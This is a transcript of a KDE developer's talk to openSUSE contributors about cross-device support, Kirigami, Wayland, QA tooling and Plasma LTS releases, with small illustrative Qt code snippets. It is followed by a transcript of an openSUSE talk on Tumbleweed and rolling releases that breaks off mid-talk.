We're used to spending our free time actually compiling things locally that run on our computer and testing things there. But testing things on different devices is something that is a bit harder for all of us. There are many different alternatives that try to solve this issue, but in general, we're getting there. Actually, if you're interested, I was working on this in KDevelop for the last month. I wrote a blog post about it. If you're interested, you can take a look. But in general, my message here is that everything was x86, and it's still x86, except for the phone. Also, yesterday, we had a presentation about how there are all of these boards that we could be using. And actually, we as KDE would be super happy to tell people, yeah, yeah, just take one of these cheap boards, install Plasma on it, and it will work perfectly. But I don't think we're really there yet in terms of supporting the hardware; especially much of the accelerated hardware is, well, not working properly. And well, on a desktop, where people are interacting very, very one-to-one, you want to have the best experience ever, right? And another difference is that we used to have just the one system, right? Well, in, let's say, 2005, I used to have my email configured on my system, and that was everything I needed. I had all of my configurations there, it was fine, it was everything I needed. Today, having a system configured doesn't mean anything, right? You need to have all of your information accessible on all of the devices. It's something that we've been working on, for example, with KDE Connect. And I think that it's something that we haven't really completely solved yet. I mean, we've made improvements, but we are not at the place where we can say, well, we can relax. And another big difference is that since we have different devices, and actually not all of the operating systems are available for all of our devices, we always end up having different operating systems on every different device. So saying, I'm going to only work for Linux, I don't really think it's even that much of an option, right? I mean, it's that much of an option if you want to solve the problems for Linux. But if you want to solve the problems for your users, you need to think in a broader spectrum about, well, how will they be communicating when they're at work, or how will they be communicating when they're sitting at home? Because if we don't do that, it's going to be others making these choices for us, namely, well, Google, Facebook, which are making very good products there. And well, they're clearly competing with us. And we should possibly be doing a better job at that as well. And possibly another big change we're seeing in this whole Linux world is that we used to have all of the software coming from the distribution, which was our whole security model so far. And it looks like it's not going to be the same for the next years, right? So well, we need to keep in mind that this is the situation that we're going to be in over the next, well, one, two years. And we need to be ready. We need to push the technology to be up to speed to make sure that we are delivering quality products like we've always done. And now, well, we run in circles. I'm not going to actually run in circles, but what I want to transmit to you is that it's all fucked up. Everything is changing, and we have so much work to do, which we're doing, but, well, it takes time. So how are we doing it?
How are we going to solve all of the problems I've been outlining here? Well, first of all, we have Qt. And we already had Qt when we started 20 years ago. Most of the problems we have today, most of the problems I outlined there, are problems that every Qt user has; even Qt as a product has them, right? Like input devices, that's definitely something they've cared about, different screens, different numbers of screens. These are all problems that need solving. And, well, we're not alone on that, which is always a nice thing. We also have Kirigami. Kirigami is a framework we started working on, like, a couple of years ago, I would say, maybe more. But the idea is that when you're writing an application, you want to be able to think about other form factors, right? And, well, with the frameworks we had up to that point — well, frameworks where you could technically run the applications on other operating systems — it just looked really horrible, right? So Kirigami offers us the possibility to design applications that will work on different form factors, which is kind of what we're doing. Where, for example, Discover, the software center: I rewrote it last year to use Kirigami. And, actually, out of the box, it worked on the Plasma phone, which is kind of cool. Another interesting thing about Kirigami is that when a developer comes to me and says, I want to work on an application that is going to work on a phone, I don't have to tell them, well, choose between, well, working on Plasma desktop or Android, right? Because actually, I would say that was kind of one of the big problems that the whole free software mobile community had, right? Like, all of them were really open. But if you wanted to get an application there, well, you really had to go through their whole set of requirements: their own set of libraries, the whole set of APIs they depend on, which seemed to come from a higher level of existence while doing mostly things that we already have today. That's part of the reason why you will possibly not see any KDE application on the Jolla market, for example. Jolla is based on Qt, right, but it's based on a Qt version they froze at some point in history. And, well, we cannot stop all of our development because they're on an old version. So together, Kirigami and different ways to distribute applications can possibly address all of that. Wayland is also something that is coming. It's something that, well, it already feels a bit like a joke, right? Wayland is going to solve it. Actually I don't know if it's a thing here in openSUSE, but, well, in Plasma meetings, "Wayland is going to solve it" — it's like, yeah, all right, you're shitting me. But we are going to have Wayland, like, now. Actually one year ago, you could already test it with Plasma. Today, you can test it and even be happy while using it. Other desktops are doing it as well. I think GNOME defaults to Wayland nowadays. So that's pretty cool. Wayland is not important because it's the new cool technology. Wayland allows us to target a much more minimal set of dependencies needed to run an operating system on a device, right? The amount of drivers that are required to set up a device with X11 is actually quite huge. And well, as soon as you start thinking about non-desktop devices, you really want to start scratching things from the very beginning. And Wayland actually delivers quite well there.
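To make the Kirigami idea a little more concrete, here is a minimal, purely illustrative sketch of how such a convergent application is typically bootstrapped from C++. The `main.qml` file name and the `qrc:/` resource URL are assumptions made for this example, not taken from any specific KDE project; the form-factor-aware UI itself would live in that QML file, importing org.kde.kirigami.

```cpp
// Minimal sketch (illustrative, not from any real KDE project): the C++ entry
// point of a convergent application whose UI lives in QML.  The main.qml it
// loads would import org.kde.kirigami and describe pages that adapt to the
// available form factor.
#include <QGuiApplication>
#include <QQmlApplicationEngine>
#include <QUrl>

int main(int argc, char *argv[])
{
    QGuiApplication app(argc, argv);   // same entry point on desktop and mobile

    QQmlApplicationEngine engine;
    engine.load(QUrl(QStringLiteral("qrc:/main.qml"))); // assumed resource path
    if (engine.rootObjects().isEmpty())
        return -1;                     // the QML failed to load, bail out

    return app.exec();
}
```

The point of the sketch is only that the same C++ side runs unchanged on a desktop or a phone; all of the adaptation to the form factor stays in the QML layer.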
Wayland simplifies a lot the picture of how a Linux desktop environment works, so that's pretty good. And along the same lines, we will have Halium really soon. I really like that project as well. I put it here; maybe it's not such a big deal. But the idea with Halium is that most hardware vendors today really care about Android when they want to get a device into the market, right? And it's not like they even care about Android that much, right? They won't even give support on the device for that long. If we expect these people to create drivers specifically for the old-school Linux kind of things, well, we're going to be disappointed, actually. As a community, we've been disappointed repeatedly; not even the Raspberry Pi, which is the coolest, most free-software-friendly hardware out there, is delivering a super polished solution on this front. So I think that there's definitely room for improvement. And what Halium offers us is to say, okay, let's not bother asking all of these people for permission to use their hardware, which is what it ends up being, this asking for things, but just take whatever they're delivering for Android and see if we can reuse it. And well, there's been quite some success there. Also, Halium is a conglomerate of a couple of communities that wanted to solve this problem and are solving this problem together, namely Plasma Mobile and a couple of the Ubuntu Phone forks, let's say. And they're working together, they're doing things. And I think it would be pretty cool if somebody at SUSE popped up over there and said, hi, guys, we're doing ARM things and we're awesome. Let's be awesome together. And then, well, changing the subject: what we were talking about before, when I was telling you about all of the new requirements we've seen appear over the last few years — most of them meant more complexity, right? Like, there's a lot of complexity that we didn't use to have, and now it's not even optional; it's something that is required for many of our users to have a successful experience when using their computers. So we need to be up to speed, right? We need to have good continuous integration systems that test things on one side, and to have applications run tests locally. That's something that we're actually very actively pushing our developers to do, including myself. But, well, it's something that I'm pretty sure you're also executing as packagers of our applications — which, well, if you're not doing, bad boys. And then there's OpenQA. I am with the SUSE people, so I have to mention it. It's really cool every time I see the project. I really want to use it more. And then I start wondering why I'm not using it more. I don't really have a good answer to that, though. If you have a good answer, you can tell me. I don't really know what's missing so that we integrate it properly into the whole development process in KDE. I know that you guys are testing KDE things, Plasma, with it. But, well, communication, like I said in the beginning, is something that we need to sort out. Also, we need to make sure that it's actually part of the development process, right? Something that I can reproduce locally, something that I can iterate on, is something that is super important, at least for me. So OBS is one of these technologies that has kept popping up at Akademy — Akademy is our annual event — for the last few years. And I'm not super sure why we're not using it more.
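As a rough illustration of that "have applications run tests locally" point from a moment ago — the class name and the check below are invented for this example and not taken from any actual KDE module — a self-contained QTest-based unit test can be as small as this:

```cpp
// Hypothetical example of a local unit test using QTest; the class name and
// the check are invented for illustration.  Save as dummytest.cpp so the
// .moc include at the bottom matches (assuming automoc or an equivalent step).
#include <QTest>

class DummyTest : public QObject
{
    Q_OBJECT
private slots:
    void addition()
    {
        QCOMPARE(2 + 2, 4);       // stands in for a real check of application logic
    }
};

QTEST_MAIN(DummyTest)             // generates the main() that runs the slots as tests
#include "dummytest.moc"          // moc output for the QObject defined in this file
```

Hooked into CI (and, on the distribution side, into something like OpenQA), the value of such a test is simply that it runs automatically on every change instead of relying on someone remembering to check.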
I think that we probably want to use OBS more. I'm not super sure why we don't. I could tell you my personal experience, but I don't know if that's super relevant here. But in any case, I think that we want more of it. We should have more of it. Let's see if we can find ways where it actually makes sense. Because in the end, it's mostly about getting the developers into the right space where they can actually start producing, right? I mean, the developer is this weird kind of asset: he's either quite idle, because developers also like to drink beer and watch movies, or, if they have all of the tools they need, they start producing things. And well, the easier it is for them to actually get things out there and get the feedback, the more possibilities for them to say, okay, I'm not going to go for a beer with my friends and I will stay home. By the way, that's an actual conversation I've had with many people. Like, why aren't you doing more KDE things, or these things you said you would do? I am going out with friends because I have an actual life. That's something that happens. I'm sure it's something that happens to you too as, well, the openSUSE community, right? But well, thanks. Also one of the big changes we've seen in the last few years is that Linux is a blooming runtime. And actually, I never looked at Linux as a runtime, right? But I mean, clearly having standard ways of executing things on Linux is something that the world wants. And actually, if the world wants something, the world gets something. It's not something that we can really argue about. I mean, it kind of started by just running things on servers, but then Docker happened and now Windows is integrating Linux executables. I mean, that's mind-blowing, isn't it? Who isn't mind-blown by Windows running Linux executables? See, everyone is. So it's impressive. And actually, I mean, we need to be part of this party, right? One of the things that has frustrated me the most in my whole Linux experience has been how, well, we've had the concept of repositories in Linux for decades, right? And in 2007, we already had them for decades. But we never had the, well, the strength to come together with a proper application store kind of concept. And actually, we are still struggling. Like, the solution for that has been the AppStream project, actually. And it is coming together now. Maybe let's say it was coming together a couple of years ago, right? But it was very frustrating for me to see how Apple came up with the whole app store thing from one day to the next, and we've been struggling massively, and we've been so slow at giving an alternative to that, because the sad truth was that we were not end-user oriented enough to be able to cater to that. Well, that was kind of a reason for me to start working on a software center. So maybe I am feeling a bit too passionate about this subject, or at least more than you guys. But in general, what I want to say here is that much like app stores were, I think, 10 years ago, the Linux runtime is a thing now. And, well, we are good at Linux. So we should make sure that we make the best out of it. I mean, I know there are some kinds of, well, fears, but, well, there are risks everywhere in life. Like, waking up is a risk. But in general, trying to get up to speed and being able to, well, deliver executables to people is something that is going to happen. And, well, we want to be there.
And in general, with a strictly Plasma hat on, I think that we want to execute any application on Linux, right? I mean, we do have our own applications, but we never really claimed that the only right thing to do was to use Qt or KDE applications on a KDE desktop. Obviously, there will be some things that we get to integrate much better on those systems. But I mean, that's more of a coincidence than an actual thing. I mean, well, if you ask me how to develop an application properly for Plasma, I will naturally tell you, just use Qt, use our frameworks, and you will be set for life because they're awesome. There are people doing awesome things on Linux. And I think that it's very important that we remember that we want to integrate these. And actually, Linux is not even about, well, old-school applications anymore, right? Like, we spend a big percentage of our time, let's say 70%, 80% — it depends a lot on you guys — in the web browser. And actually, integrating the web browser is possibly one of the things that we should be doing much better. We actually have some kind of approach there, but, well, it's work in progress. But in general, when we talk about supporting a better Linux runtime, we also need to remember that it's about running applications better and making sure that systems are always up to date. And to have that, we need good UIs. We need to make sure that the user knows what he's installing and where it's coming from, because that's actually something that, well, didn't use to be part of the problem, but it could be now. And to give information about what the applications are doing and how they're interacting with the whole operating system, right? I mean, the fact that it's easy to install an application doesn't mean that it's safe or even a good idea, right? So we need to keep in mind that this is part of the solution and, well, give it the love it needs. And like I was saying, we need to reach out to other operating systems. We cannot think that Linux is everything. I mean, even Linux is not the thing, right? Like, Android is Linux, but running a Linux application on Android is quite an impossible task, at least on a normal Android phone. So we need to be flexible. We need to learn that setting very strict barriers is not going to help anyone, I think. And well, it's something we need to work on. And the same goes for different operating systems and different form factors: we need to think about how people will be using their computers, what their computing experience will be. And like I was saying, the web as a first-class citizen. So I don't know if you saw it, but one of the developments that has happened in Plasma recently was the addition of a module that integrates Firefox and Chrome with the Plasma shell. Being able to know at least what tabs are open, and there are also some nice features, like extracting information from them. I think that this is something that was sorely missing. And if we can make good use of it, I think that we can embrace much better the users that could come in the next few years. Now, how do we improve? And how do we improve, I mean, in a strictly openSUSE-to-KDE kind of way, although it possibly applies to many other communities? One of the big things is that we need you guys to speak up. So if there's a problem, if there's an issue, you should be saying so. It's not really useful to know that people aren't happy if you don't really know why, what exactly their pain points are. Actually, nothing in KDE itself is closed, right?
Many of you could go today to the Plasma mailing list, to the Plasma IRC channels, and, well, speak your mind. Especially if you're kind and smiley, it always helps. But actually we encourage everyone to be part of the conversation. Even sprints: we host, well, physical, in-person sprints for our meetings. I think having you guys there would be something really interesting. And actually I've always wondered why people from distros — it's not something that is really specific to openSUSE — usually don't feel compelled to attend, right? I mean, I have the impression that if I was coming up with a product using something, I would want to talk to them and to be part of the discussion. And I think that it's something that could change, and possibly will change, in the next few years. So what I did now was to go a bit through the bug reports. It's a bit ugly, but it's not my fault, it's Bugzilla's fault. So I went through the bug reports of a few KDE components, and I drew this nice pie chart. Here we can see the openSUSE RPMs are the orange thing at the bottom, right? So part of your voice is what developers will hear from the bug trackers. Because, well, the discussion is not really happening on mailing lists, possibly because the conception of mailing lists is that you're actually discussing C++ clicky-clacky things, right? But, well, if the discussion is not happening on mailing lists, then it needs to happen in bug reports. So here we can see that maybe roughly, let's say, 15 to 20% of Plasma bug reports are openSUSE. Having a very big number here also is not very good; it might just mean that there are lots of users reporting the same bug over and over. But, well, it shows there's a presence, it shows there's interest in getting things fixed. Another product we can see here is Krita. Krita is a project that is very actively used outside of our normal comfort zone, let's say. Like, one of the big yellow things is Microsoft Windows, which is something quite unique among KDE projects. Microsoft Windows users are making themselves heard in this community. And this means that their issues will be part of the fixes that the next release is going to have. And by the way, openSUSE is the, well, ugly blue thing at the bottom. Making sure that you're a big part of the pie is making sure that you're being heard. And, well, like I said, I feel strongly about Discover, which is my project, at least in Plasma. And here, openSUSE is not there. openSUSE is not there. It's possibly because it's part of the unspecified, which is the big red thing. But, well, I looked it up. We had 11 bugs reported in Discover in, well, its whole history, which is about two or three years, but still. And my complaint here is that this possibly means that openSUSE users are not really using Discover at all. And I haven't had a proper discussion with anyone about why it's not an acceptable solution. And actually, this is, well, not fun for me. But in the end, when we talk about how we would like to communicate more, it's about first explaining why things don't work, when things are not working, and making things reproducible. Like I was saying before, I've been working on improving the development process, so that if our users, or the users of our applications, are going to have a different set of requirements on different operating systems, we can embrace that. So I integrated it into KDevelop, which is our IDE.
And if we have a bit of time — actually, we are going to have a bit of time — so if somebody wants, we can look at the video. But in general, well, you know there's a problem. Also, all of the distros — and I think you guys have the same thing — have their own bug tracking systems, and making sure that bugs are transferred upstream and that, well, developers know everything that is going on there is something important. And while you can say, well, everything is open and you can go through openSUSE bug reports, well, remember that we have maybe 15 downstreams. And while they're not all as big and awesome as openSUSE, well, they all want to be there. And well, we need to have this kind of feedback and we need to have these kinds of, well, things going on. And well, that was my talk. If you have any questions, you can ask them now, otherwise I'll show you my video. Good morning. I just wanted to know, do you spend most of your resources on the actual desktop environment, or are there certain projects, certain applications that get more attention than others? I know you, for example, work on this Discover project. One of my favorite KDE apps is digiKam, but it seems like it doesn't get a lot of work on it. So how does that work? Well, in KDE, we don't assign resources. Actually, as a free software community, we don't have the ability to tell people what to work on. We do have sprints. We've had several digiKam sprints, for example, which is a space where we can actually help people get things done in a very specific area. But in general, we don't tell people to work on things. We can set some kind of expectations, but that's as far as we get to go. Obviously, for example, you mentioned Discover. I'm working on Discover in my paid time, so one thing you could do is to convince my boss that digiKam is the best thing ever and also the worst thing ever, which means that it needs improvement, right? Because when things are quite good, usually it's hard to get developers on them, which is kind of interesting, right? At least you need to have people pulling the cart. But in general, the big and direct answer is: we don't get to make people work on things. We can try, but we don't get to do that. What we can do is set some resources aside for it, and we actually do. You're encouraged to help. Actually, you can always help on a free software project — I would say a KDE project, but any free software project — and don't even think, I am not doing that because I am not a developer. That is not really part of the conversation. You can always help doing documentation, which is super fun. You can always help doing drawings. Whatever you're good at doing, I'm sure that, well, any project can make sure that it is useful, unless it's crochet. I don't know if that would be a thing. But PR is always needed. Actually PR is one of the big problems in free software, right? We need people who are actually capable of pushing projects without being the actual people doing the features, and incidentally, the people doing the features are usually not very good at communicating. But yeah. I hope that answered your question. Okay, I've got a question particularly about LTS versions. We have an LTS version of Plasma in Leap. Looking at our bug tracker, it's the largest single component in terms of reported bugs. It's higher than even our catch-all 'other' bin. Obviously, your graph shows that too, in the sense that our openSUSE bugs are a huge chunk of that pie.
So the two questions are: what is really being done to maintain those LTSes? Because they don't seem like they're getting much love or attention after that initial release. I get the feeling they've just been thrown over the wall. And what is the plan for future LTSes? When's the next one? And how will that be better than the current one? Yeah. Good questions. So, a bit like the last answer, we've been sending patches. I sent a patch to the Plasma 5.8 branch last month for Discover. I mean, things are happening. It's not something we coordinate, though. We don't have a person responsible for LTS. Maybe it's something that could be useful; it's not a figure we have at the moment. But in general, if a developer believes that putting time into something will make a big impact on the user base, I'm sure he is going to. So if you tell me, as the Discover maintainer, we have this big problem with Discover 5.8 and we need to have it solved, I will spend time on it, right? But we need to know that this is an actual big problem. To give some perspective, we had a huge issue with the latest Kubuntu LTS, which actually was not even using our LTS, and we also had to spend some time on that. So what is really important for us about an LTS is actually that we have the certainty that if we work on it, it will get to the user. Because there's nothing worse for a developer than working on a fix that might not be hitting the user. And actually, that was the kind of reasoning behind doing an LTS: people are actually going to be releasing this Plasma 5.8 for a long time, so we can just as well keep it alive. And if there are things to be improved, well, do it. Now, if there are big problems, well, talk to the people; I have never heard about them. But we have — look at the pie charts; we filed those upstream as well, and they're not going down. Well, escalate them. I mean, it's always a matter of how to make yourself heard, right? I mean, if you look at any project's bug report system, you will see a list of crazy problems. That doesn't mean that you can take action on all of them. And I'm also not saying that they are crazy problems. But for a developer, it's a lot of time that you need to spend to reproduce an issue, often on a different platform, make sure that you can reproduce it, fix it, and then submit it. So having some kind of hand-holding, especially from the platform, to say, okay, I can reproduce this, give me a fix, I'll send you a patch — I think that this kind of conversation can be much more agile than just saying, well, it's reported there. I mean, you need to know what the actual pain points are, because it's a matter of: I have these resources, how do I allocate them so I can make my users the happiest? But it's a wider subject. So, possibly, yeah. In general, though, it's worth mentioning, I think, that the reason we did Plasma 5.8 LTS was because openSUSE said, we're going to be having a long-term release of our Leap and we want to be supporting what you're offering, fresh — which I believe is a very good idea. If we're having a lot of the discussions about how we want to distribute software better, it's because users are not using actually fresh, supported versions of software. This is one of the problems of Linux today. And being able to offer a solution there was very good for us.
And actually, for us, it's very frustrating, because the only distro that picked up Plasma 5.8 LTS was openSUSE, which is kind of not fun. But it's not something we really have a say in. But in general, we do want to have another LTS. I suggest that somebody who is familiar with openSUSE's release schedules gets in touch with the Plasma team. We've discussed having another one, and we should definitely make sure that it aligns properly with you guys, because I think it's worked well. If we don't do so, we will have an LTS release that will not have a distro behind it. So, well, knowing what the problems are is going to be much harder, or at least harder than it is today. And like you pointed out, well, there are things to be fixed, right? But you need to have people telling you, well, this is a problem, remember? Which is, I guess, not a nice job for you guys, because nobody really likes to be the kind of person going, oh, my, my, my, fix my thing. But well, such is life. But in general, if you want to talk further about it, we can do that here or by email once I'm back home. I think it's an interesting subject and doing a better job there would be really fun. Did I answer everything you asked? So, you mentioned the KDE community is beginning to look at OpenQA, somewhere around slide 13, I think. So, given that in the past KDE has been criticized because in the tarballs and in the SUSE RPM source packages there were never really many test scripts, I've noticed that in the latest SUSE source RPMs, the KDE source RPMs, there are OpenQA scripts in there, which is an indication you're beginning to test openly. Given that there aren't many human beings who can do both — unfortunately, a developer and a tester tend to be two different people — my question is: what is the acceptance inside the KDE community, maybe the broader KDE community, not only the developers, but maybe you have some testers as well — what is the current perceived acceptance of OpenQA? So I think that we're probably looking at the whole thing the wrong way. So early on, when I defined developers — I defined developers — sorry, who asked the question? Because I lost you and I don't know where to look now. Thank you. I defined developers as people who make software, right? So I wouldn't say there are first developers and then testers. Actually, what I would diagnose as a problem is the fact that, while it's possibly part of the source RPMs you have, it's not really part of our Git repositories, right? So it's not really part of our lingua franca. We need to make sure that these things are part of the development process, that the developers can have access to these things — and having access means it's in my Git repo and this test is not passing, so I don't get the green light. It is not about reaching out to these other communities, because adding communication barriers seldom gets things solved. So I would say that if we want to do it properly, it needs to be part of the development process and the development tools that we use on a daily basis, and it cannot live only in the source RPMs, because, like I said before, there are 20-something distros that build packages out of any of our releases, right? And we cannot be responsible for everything in all of these distros. In fact, one of the problems we are having is that distros put random things into our software, right?
Which, I mean, sometimes is done by somebody thoughtful, and sometimes is done because something didn't work and somebody was angry, right? So I think that if we want to have this kind of feedback loop working properly, we need to share the same communication space, and being in the same communication space means being in the same Git repositories, being in the same, well, chat rooms. And if we can do that, I am sure that we're going to see good results, because things start working well when you see that the people who take care of creating the software are actually committing to not breaking things, and when they change something, they know whether something breaks. Oh, yeah, sorry. So, both GNOME and KDE have something like an app store program, and the term app store also came up in your talk somewhere. So I was wondering, isn't it perhaps time to consider the Linux distributions an app store in their very own right, especially considering that KDE and other applications connected to that are delivered within a day or so already? Do we really need KDE app stores, or GNOME app stores for that matter? I don't know. From a very KDE kind of perspective, we had kde-look and kde-apps for 15 years; they were there for a very long time, and I have never seen them as a competitor to whatever my distro was doing. If you want to get backgrounds, if you want to get icon themes, they can just as well come from our website. I kind of agree that distros are like an app store. That was what I meant when I said I was angry that Apple did it: we had all of the information and we had all of the applications for a very long time. We just were not careful enough to put them into a nice, digestible user interface that people would be using. So now, I guess you're talking about application stores, and I think that these stores are doing a good job, and I don't think that's going to go away. But the same way we have 25 distros today — and when I say 25, I mean probably more than 100 — I know that people are going to be delivering applications in systems that are just compatible with what the distributions are actually distributing today. So I think that what is really important here is not who the application distributor is. I can give you an answer from a very Discover-maintainer point of view, but it's not really useful. I think that the useful conversation we can be having now is: what is a Linux operating system today, and what are the things that we share among each other, so that we can create solid products together without fighting about the most menial things over and over. One of the big differences that I see with the new cross-distro formats, which we didn't have in the pre-cross-distro-format times, is that it's not really a discussion about whether DEB or RPM is better. You can have them all, and actually you will have them all. Like, most of you, in five years, will have Snaps on your computer, you will possibly have Flatpaks on your computer, and you will have distro applications on your computer, and possibly there will be distros that are not distributing applications themselves at all. So I think that we need to just acknowledge that things are changing and see how we can work best together, and actually make sure that we're truly working together.
Like, we're not adding invisible barriers or social barriers, but actually making a Linux that can work on anybody's computer and actually solve everyone's needs, instead of being this tool that is only really fun to use when you're an admin watching movies at home. So, if there are no more questions — I think actually there's no more time. Is there? Possibly not. Well, thank you very much for listening to me. And if you want anything, you can send me an email. I'll be happy to answer you there as well.
We often have the impression that while we keep working, things don't seem to get solved. In this presentation we will discuss the development process, then go over what the KDE community has been up to in terms of QA, and bring some ideas so that we can create, together, better solutions.
10.5446/54477 (DOI)
I'm now in the after-lunch slot, so I hope you don't mind if people keep trickling in, but I'm going to get things started. So I'm Richard Brown, Chairman of the openSUSE project, and I'm here to talk to you today about Tumbleweed: why I think it is the best thing since sliced bread, why I'm more excited about this than anything else we're doing in openSUSE, why I think rolling releases are the future of Linux distributions, and some of the bits and pieces where I don't think we're doing everything that we could be doing to make it as smooth as it possibly could be. Because, you know, we're not perfect, we're just great. To talk about rolling releases, I really have to start at the beginning. We have to explain where Linux comes from, what a distribution is, and when we're talking about Linux distributions or traditional distributions, we are talking about regular releases. It's what most Linux distributions follow. It's a model where you collect all of your different upstream packages, you put them all together, you make a cohesive operating system as a distribution, and you're releasing it every X years or months. It depends on your users and your use case how often that is. Community distributions generally favor slightly faster release schedules, so distributions like Fedora, Ubuntu, or the old openSUSE would be every six to 12 months, and then, of course, you have things like enterprise distributions, where the new major release of an enterprise distribution will be several years away. Once that release is out, once users can download that software and start using it, the general model of a traditional distribution is to not dramatically change the software within it. You know, being very, very conservative from that point, and only very reluctantly upgrading, very reluctantly patching those things you need to patch to keep the operating system working, because you don't want to introduce unexpected changes, you don't want to break anything. So, you know, very, very reluctantly doing that, generally freezing everything, which means when you look at the big wide open source world and everything else going on, and packages elsewhere, upstream projects elsewhere, the only choice to maintain a regular release is with heavy use of backporting — you know, taking patches and fixes from the upstream project and putting them into your stable regular release. And like I said, this is the traditional model; it's, you know, followed by Debian, Fedora, openSUSE Leap follows it as well, and, yeah, Ubuntu. But developing these is tricky. You need something to start this. How do you develop a regular release? Most other Linux distributions rely on a development branch to do this. We used to; ours was called Factory. But, you know, other distributions have things like Debian Sid or Fedora Rawhide, or Ubuntu have something that they kind of call dailies, but it never seems to work. But it's where the developers of a distribution should be actively putting in their various upstream packages to constantly give you a rolling picture of, you know, where is your code base, what is your next regular release going to look like? Nothing's ever frozen in there, it's always moving, and it's almost always broken. This is true of every single one out there, every single development branch; it's typically broken. And this is problematic because developers need their system to be as close as possible to the upstreams they're working on.
You know, they need to be able to see both where the particular part they're working on is and everything else around it. They need to be able to see how it's all working. Dev branches accomplish that, but they're completely and utterly unstable and unusable. So you've got this sort of nice deadlock problem of, you know, how do you actually then get a good picture of what's really going on? What generally happens is developers stop using their dev branch, apart from when they really, really have to, to comply with some process somewhere. That means you have very narrow attention being paid to what's actually going on in all those upstreams that you're relying on to build your distribution. So it doesn't work for developers. They just move on and find some other way of hacking together their packages to get them into the main regular releases. And that becomes a really big problem as a distribution project. Traditional openSUSE as a distribution project used to do this; we used to have Factory, and as the users and contributors of your dev branch decline, your entire project starts getting slower. There's no doubt about it. You get fewer indications of bugs before a regular release. You get fewer new features in your regular releases, you know, less innovation there, because nobody knows what's going on. So even the most ambitious features they think of are relatively narrow things compared to what they could possibly be getting if they had a broader view of where the world is. Over time, in particular, you end up with increased technical debt, stuff that is lingering around in your dev branch for ages and no one ever fixes it, which then means when you do eventually have a regular release and you do eventually need to fix it, clearing that technical debt makes that release more and more expensive. It's more and more hard work. It's more and more work to get the community involved in doing it. And yeah, it just really, really starts holding the entire project back. It's not just a problem for the distributions trying to get this software into the hands of users, though. It's a problem for upstream developers also, because every upstream project, especially in this day and age, wants to get their software into the hands of users as fast as humanly possible. Dev branches technically accomplish this, but they're useless really, because no user is going to be using them. Regular releases don't accomplish it; whatever schedule a distribution picks, it's going to be too slow for that goal of getting it into the hands of users quickly. And then containerized apps, things like AppImage, Flatpak, Snappy, promise to solve this, but it's not quite that easy. You know, they'll make it there one day, and if you want to hear more about my rant about that, you can come see my talk on Sunday at three o'clock in the other room. But yeah, the situation is not ideal there. And then when you start looking at users, and particularly enthusiastic Linux users — you know, the kind of core part of the community that is interested in open source because it's open source — they also want to have that software as fast as possible. They don't want to wait, but when they get it, they want to make sure it works. So dev branches don't work there either. And there's also the sort of second thing: users want a consistent experience.
They want it to feel like it's well put together — that, you know, it's consistently themed, that it looks right, that it feels right. The UX works properly. These are key requirements that users have. And this is another problem, actually, that a lot of these containerized apps are starting to bump into. You know, they're getting out there and running these things, but, you know, getting that feeling of "this is a consistently built and consistently engineered solution" just doesn't work with either the regular release model, where it's always too slow, or the development branch model, where everything's just moving too fast and breaking. And these are the people we've got to capture, because these are the people that are going to be our contributors in the future. They're the ones who are enthusiastic, they're the ones who are looking at these upstreams, who are keen on what we're doing. We need to find a way of encouraging them to use this software and, you know, get enamored by it, so we can then start having them help maintain it and make things even quicker and faster. Rolling releases are the answer to these problems. But what is a rolling release? Well, in basic terms, a rolling release is a Linux distribution without a release schedule. No version numbers, no point releases, no milestone dates, frequently updating all of the packages in the operating system whenever they're ready. So you can just download it, start using it, and you're always going to get the latest ready, stable version of everything. There are other examples, of course — I'm talking about Tumbleweed, but there are sort of two other main distributions advocating this model and really pushing it, Gentoo and Arch, which are, you know, quite popular, especially in that enthusiastic user base area, where you have people downloading them and getting the latest of everything. And when I talk to people about rolling releases, I always hear the same three complaints, or the same three excuses for why they don't like a rolling release. There's a perception that they're unstable. There's a perception that they're unreliable, which is subtly different from being unstable. And there's a perception that they're hard to live with. In the case of unstable, I'm talking specifically about the fact that it's always changing. The way I used my system yesterday is now different from the way I have to use my system today. A fast-moving code base is going to include changes. That is kind of part of the point. So, you know, there is always going to be a little bit of change in there. The question sometimes is how fast, and having different rolling releases at different paces is something that I think the world needs to start thinking about. But to really solve this problem, you need to be making sure that your rolling release is building everything, testing everything, and then integrating everything in a consistent, cohesive fashion, constantly. And then, when that is delivered to users, it's delivered in a way that those behavioral changes — that sudden new way that that new application is behaving — don't get in the way of the work they need to do that day. It's changed, they're going to have to learn it at some point, but you don't want it to block their work when they need to get their work done.
It is thousands of moving parts from thousands of different upstream projects, and the distribution has to find some way of them getting it all working together. Just like we're solving the stability problem, you've got to build it consistently. You have to test it consistently, and you have to integrate it consistently. But speaking from experience, it isn't just a case of testing it before you ship it, but actually testing at the point of submission. Finding as early as possible when someone is contributing to a rolling code base, does this work? Will this break the entire build? Will this ruin everything? Testing it there really, really early, getting fast feedback, helps both with the kind of contribution engagement and use. And then, of course, you have a second shield of it. Testing is a whole. Because you can't just think of a Linux distribution like a collection of packages. This is the fatal flaw, which I think so many other distributions get wrong, and we get right, is we think of our distribution like a cohesive single thing that we ship. And we try and make sure that it all works together in one bit. And we're not falling into the trap of distributions like Arch, where, oh, we're shipping this wonderful library right on time, and they're forgetting that about the 20 other things it needs or should go with it aren't there, aren't integrated. And ultimately, the goal there is to make sure that you don't ship something that doesn't work. Talking about testing, most of the distributions, rolling and regular, and formerly us in the past, rely on passive testing with their community distributions. The idea of upstream has released something, we've packaged it, we've thrown it in some testing branch somewhere or something like that. And then we wait a bunch of days, and we just trust that someone in the community is going to look at it and play with it, and then it's good enough we ship. No one ever actually checked, did anyone actually tested it? They just trusted that no one filed enough bugs, it must be fine, so we shipped it. The model works to some degree. The bigger the community is, the more chance you have of finding those bugs quickly enough, and that testing window works out okay. But it's still Russian roulette. At some point, your users are going to get shot by something that slipped by that approach. Passive testing just does not work for distributions. You need to have active testing. You need to have proactively confirming, does this new package in this distribution break something just on its own? Does it work at all? Did the developer completely screw it up? Or does it work when you install it with a context of 20, 30, or 4,000 other packages? And does it change, or at least even if it's working technically speaking, does it change in a way that users don't expect? And you need to be able to answer that question in order to be able to integrate everything quickly and fast and deliver it to the users fast enough before an upstream release has even made that change. So you need to have a way of knowing at least as fast as possible after an upstream check something new in, or really before they check it in. Does this change something? Does this break something? So we can get working on fixing it and shielding our users from those problems. And then the last problem, the hardest to live with it, but when looking at the other rolling releases, Arch, I really respect Arch. 
